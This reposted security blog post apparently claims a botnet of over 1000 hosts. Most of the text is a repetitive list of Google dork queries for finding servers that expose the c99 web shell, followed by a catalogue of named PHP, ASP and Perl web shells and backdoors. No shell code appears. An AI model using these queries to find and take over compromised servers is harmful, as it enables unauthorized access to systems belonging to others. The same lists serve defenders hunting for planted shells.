Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout”

C99Shell v[.] 1[.]0 pre-release build #16 software apache

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

“c99shell v 1[.]0”

inurl:”c99[.]php”

allintitle: C99shell filetypehp

C99Shell v[.] 1[.]0 pre-release build #16!

“c99shell v[.] 1[.]0 pre-release”

c99shell v[.] 1[.]0 pre-release build #5

allinurl:”c99[.]php” filetypehp

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

!C99Shell v[.] 1[.]0 pre-release build #16!

inurl:c99[.]php

intitle:C99Shell v[.] 1[.]0 pre-release +uname

inurl:c99[.]php

c99shell v[.] 1[.]0

allinurl: c99[.]php

–[ c99shell v[.] 1[.]0 pre-release build #16 powered by Captain Crunch Security Team | ]–

inurl:”/c99[.]php”

c99shell +uname

c99shell php + uname

c99shell php + uname

–[ c99shell v[.] 1[.]0 pre-release build #16 powered by Captain Crunch Security Team | ]–

allinurl:c99[.]php

!C99Shell v[.] 1[.]0 pre-release build #5!

C99Shell v[.]1[.]0 pre-release

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

inurl:c99[.]php

intitle:c99shell filetypehp

“Encoder Tools Proc[.] FTP brute”

“c99″ filetypehp intext:”Safe-Mode: OFF”

c99shell v[.] 1[.]0 pre

inurl:c99[.]php

intitle:c99shell uname -bbpress

intitle:”index[.]of” c99[.]php

inurl:admin/files/

intitle:”index of /” “c99[.]php”

intitle:”index of” intext:c99[.]php

intitle:index[.]of c99[.]php

intitle:”index of” + c99[.]php

intitle:index/of file c99[.]php

intitle:index/of file c99[.]php

index of /admin/files/

intitle:”Index of/”+c99[.]php

c99[.]php “intitle:Index of “

c99[.]php “intitle:Index of “

c99[.]php “intitle:Index of “

intitle:index[.]of c99[.]php

img/c99[.]php

intitle:index[.]of c99[.]php

img[.]c99[.]php

intitle:”Index of/”+c99[.]php

“index of /” c99[.]php

c99[.]php

intitle:”Index of” c99[.]php

“index of” c99[.]php

“Index of/”+c99[.]php

[/PHP]

List of ALL hacking Shells

C99Shell v[.] 1[.]0 beta (5[.]02[.]2005) PHP

b374k PHP

b374k-mini-shell PHP

Cyber Shell PHP

GFS Web-Shell PHP

NFM 1[.]8 PHP

r57shell PHP

Small Web Shell by ZaCo PHP

nsTView v2[.]1 PHP

DxShell v1[.]0 PHP

C99madShell v[.] 2[.]0 madnet edition

PHP

CTT Shell PHP

GRP WebShell 2[.]0 release build 2018

(C)2006,Great PHP

Crystal shell PHP

Loaderz WEB Shell PHP

NIX REMOTE WEB SHELL PHP

Antichat Shell PHP

CasuS 1[.]5 PHP

Sincap 1[.]0 PHP

C99Shell v[.] 1[.]0 pre-release build(safe-

mode) PHP

hiddens shell v1 PHP

Web-shell (c)ShAnKaR PHP

Predator PHP

KA_uShell 0[.]1[.]6 PHP

NGH PHP

C2007Shell v[.] 1[.]0 pre-release build

#16 Modded by Adora & u9 h4c93r

PHP

Antichat Shell[.] Modified by Go0o$E

PHP

c0derz shell [csh] v[.] 0[.]1[.]1 release PHP

iMHaBiRLiGi Php FTP PHP

PHVayv PHP

phpRemoteView PHP

STNC WebShell v0[.]8 PHP

MyShell PHP

ZyklonShell PHP

AK-74 Security Team Web Shell Beta

Version PHP

Gamma Web Shell Perl-Cgi

go-shell Perl-Cgi

PhpSpy Ver 2006 Perl-Cgi

CmdAsp[.]asp[.]txt ASP

CyberSpy5[.]Asp[.]txt ASP

klasvayv[.]asp[.]txt ASP

indexer[.]asp[.]txt ASP

NTDaddy v1[.]9 ASP

reader[.]asp[.]txt ASP

RemExp[.]asp[.]txt ASP

zehir4[.]asp[.]txt ASP

Elmaliseker[.]txt ASP

EFSO_2[.]txt ASP

accept_language PHP

Ajax_PHP Command Shell PHP

Antichat Shell v1[.]3 PHP

Ayyildiz Tim -AYT- Shell v 2[.]1 Biz PHP

aZRaiLPhp v1[.]0 PHP

backupsql PHP

c99 PHP

c99_locus7s PHP

c99_madnet PHP

c99_PSych0 PHP

c99_w4cking PHP

Crystal PHP

ctt_sh PHP

cybershell PHP

dC3 Security Crew Shell PRiV PHP

Dive Shell 1[.]0 – Emperor Hacking Team

PHP

DTool Pro PHP

Dx PHP

GFS web-shell ver 3[.]1[.]7 – PRiV8 PHP

gfs_sh PHP

h4ntu shell [powered by tsoi] PHP

iMHaPFtp PHP

ironshell PHP

JspWebshell 1[.]2 PHP

KAdot Universal Shell v0[.]1[.]6 PHP

lamashell PHP

Liz0ziM Private Safe Mode Command

Execuriton Bypass Exploit PHP

load_shell PHP

matamu PHP

Moroccan Spamers Ma-EditioN By

GhOsT PHP

myshell PHP

Mysql interface v1[.]0 PHP

MySQL Web Interface Version 0[.]8 PHP

mysql PHP

mysql_tool PHP

NCC-Shell PHP

NetworkFileManagerPHP PHP

NIX REMOTE WEB-SHELL v[.]0[.]5 alpha

Lite Public Version PHP

nshell PHP

nstview PHP

PH Vayv PHP

PHANTASMA PHP

PHP Shell PHP

php-backdoor PHP

php-include-w-shell PHP

pHpINJ PHP

PHPJackal PHP

PHPRemoteView PHP

Private-i3lue PHP

pws PHP

r57 PHP

r57_iFX PHP

r57_kartal PHP

r57_Mohajer22 PHP

rootshell PHP

ru24_post_sh PHP

s72 Shell v1[.]1 Coding PHP

Safe0ver Shell -Safe Mod Bypass By

Evilc0der PHP

Safe_Mode Bypass PHP 4[.]4[.]2 and PHP

5[.]1[.]2 PHP

SimAttacker – Vrsion 1[.]0[.]0 – priv8 4

My friend PHP

simple_cmd PHP

simple-backdoor PHP

SimShell 1[.]0 – Simorgh Security MGZ

PHP

SnIpEr_SA Shell PHP

Uploader PHP

WinX Shell PHP

Worse Linux Shell PHP

zacosmall PHP

Antichat Shell v1[.]3 PHP

Ayyildiz Tim -AYT- Shell v 2[.]1 Biz PHP

aZRaiLPhp v1[.]0 PHP

CrystalShell v[.]1 PHP

Cyber Shell (v 1[.]0) PHP

dC3 Security Crew Shell PRiV PHP

Dive Shell 1[.]0 – Emperor Hacking Team

PHP

DxShell[.]1[.]0 PHP

ELMALISEKER Backd00r ASP

GFS web-shell ver 3[.]1[.]7 – PRiV8 PHP

h4ntu shell [powered by tsoi] PHP

JspWebshell 1[.]2 JSP

KAdot Universal Shell v0[.]1[.]6 PHP

Liz0ziM Private Safe Mode Command

Execuriton Bypass Exploit PHP

Macker’s Private PHPShell PHP

Mysql interface v1[.]0 PHP

MySQL Web Interface Version 0[.]8 PHP

NIX REMOTE WEB-SHELL v[.]0[.]5 alpha

Lite Public Version PHP

Perl Web Shell by RST-GHC PL

Private-i3lue PHP

RedhatC99 [login=redhat-pass=root]

PHP

Rootshell[.]v[.]1[.]0 PHP

s72 Shell v1[.]1 Coding PHP

Safe0ver Shell -Safe Mod Bypass By

Evilc0der PHP

Safe_Mode Bypass PHP 4[.]4[.]2 and PHP

5[.]1[.]2 PHP

SimAttacker – Vrsion 1[.]0[.]0 – priv8 4

My friend PHP

SimShell 1[.]0 – Simorgh Security MGZs

PHP

WinX Shell PHP

Worse Linux Shell PHPd

The post 2 Hours OSINT Google Dork proof here is a 1000+ server/host botnet first appeared on Just another WordPress site.



This post first appeared on Computer Security.org - CyberSecurity News, Inform, please read the originial post: here

Share the post

2 Hours OSINT Google Dork proof here is a 1000+ server/host botnet

×

Subscribe to Computer Security.org - Cybersecurity News, Inform

Get updates delivered right to your inbox!

Thank you for your subscription

×